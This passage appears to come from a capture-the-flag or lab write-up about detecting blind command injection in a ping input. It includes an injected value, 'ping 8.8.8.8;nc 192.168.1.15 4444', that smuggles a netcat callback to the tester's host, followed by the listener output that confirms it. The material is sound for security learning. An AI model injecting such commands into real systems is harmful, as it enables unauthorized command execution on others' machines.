This time we'll be pinging something. Since there is no output, it is considered blind and we can't determine if it is vulnerable or not. Let's ping ourselves.

And we get this.
```txt
Did you captured our GOLDEN packet?
```
And if we capture our traffic, we can see that we are getting pings from 172.17.0.2. Let's try adding another commands to see if its vulnerable. I'll be trying nc, you can also try this with wget or curl. 
```bash
ping 8.8.8.8;nc 192.168.1.15 4444
```
And set up a listener on port 444 to see if we can get it. And a second later:
```bash
nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.15] from (UNKNOWN) [172.17.0.2] 46832
```
We got something! Which means this input is vulnerable to command injection.

